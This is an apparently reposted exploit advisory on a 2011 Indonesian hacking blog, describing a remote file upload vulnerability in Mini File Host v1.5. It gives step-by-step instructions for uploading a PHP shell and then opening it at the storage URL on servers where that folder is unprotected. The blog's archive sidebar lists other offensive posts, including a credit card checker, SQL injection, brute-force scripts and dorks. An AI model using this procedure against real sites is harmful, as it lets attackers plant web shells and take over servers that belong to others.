=====================================================================
========= |
_ _ _ _ _ _ |
/ \ | | | | / \ | | | | |
/ _ \ | | | | / _ \ | |_| | |
/ ___ \ | |___ | |___ / ___ \ | _ | |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| |
===================================================================== |
========= |
[»] ~ Note : This vulnerability allows you to upload if the "storage" file isn't protected with a htaccess file or |
anything else |
===================================================================== |
========= |
[»] Mini File Host v1.5 Remote File Upload Vulnerability |
===================================================================== |
========= |
[»] Script: [ Mini File Host ] |
[»] Language: [ PHP ] |
[»] Site page: [ Mini File Host v1.5 ] |
[»] Download: [ http://www.hotscripts.com/listing/mini-file-host/ ] |
[»] Founder: [ Mr.Z <tzar.evil@yahoo.com> ] |
[»] Greetz to: [ all muslims , ViRuSMaN ] |
########################################################################### |
===[ Exploit ]=== |
Click on "Browse" and select your php shell |
Click Upload |
After it finishs , you will see this meassage ( |
Your file was uploaded! |
Your download link |
http://server/script/download.php?file=328shell.php |
) |
Copy the new Name of the shell "328shell.php" |
Now Go to this Url |
http://server/script/storage/328shell.php |
if "Storage" wasn't protected your shell will open |
Author: Mr.Z <- |
###########################################################################
Jumat, 25 November 2011
//
Label:
Web Hacking
//
0
komentar
//
0 komentar to "Mini File Host v1.5 Remote File Upload Vulnerability"
Laman
x0wn3d
nanda. Diberdayakan oleh Blogger.
About This Blog
My Blogs
Blog Archive
-
▼
2011
(27)
-
▼
November
(24)
- Data Kariawan ( Pascal )
- Bug di hosting 000webhost
- Templete Portal Blog
- x0wn3d Credit Card Cheker
- Script scan site 1 server
- Script upload
- Mini File Host v1.5 Remote File Upload Vulnerability
- game shaun the sheeps online
- ubah nama kamu menjadi muka
- vBulletin 4.0.x => 4.1.2 (search.php) SQL Injectio...
- Perbedaan VB 6 dan VB .Net
- FTP & Mysql Brutaforce ( PHP )
- wordpress brutaforce (PHP)
- cara menginstal backtrack 5 extensi vmdk pakai vmware
- cara memanggil file .exe pakai visual basic
- membuat form berpassword menggunakan visual basic
- menghitung luas lingkaran,persegi,etc pakai pascal
- bot update status fb pakai perl
- PHP Login script
- 7,000 Dorks
- Setting 404 Error Page di 000webhost
- Serial Key smadav 8.7
- Joomla! Security Scanner
- Script Mini host file
-
▼
November
(24)
Followers

Posting Komentar